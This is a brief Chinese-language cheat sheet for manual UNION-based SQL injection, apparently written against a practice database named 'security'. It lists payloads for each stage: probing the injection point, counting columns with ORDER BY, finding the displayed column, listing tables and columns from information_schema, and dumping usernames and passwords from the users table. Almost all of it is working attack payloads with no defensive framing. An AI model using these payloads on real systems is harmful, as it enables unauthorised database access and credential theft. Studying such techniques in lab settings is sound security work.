查询id=1
select * from aa where id=1
寻找sql注入点
select * from aa where id=1‘ and ’1‘=’1 select * from aa where id=1‘ and ’1‘=’2
查多少列
select * from aa where id=1 ‘ order by 3 %23
查显错位
select * from aa where id=-1’ union select 1,2,3 %23
求表
?id=-1'%20 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 %23
求列
?id=-1'%20 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),3 %23
求内容
?id=-1'%20 union select 1,(select group_concat(username,0x23,password)from security.users),3 %23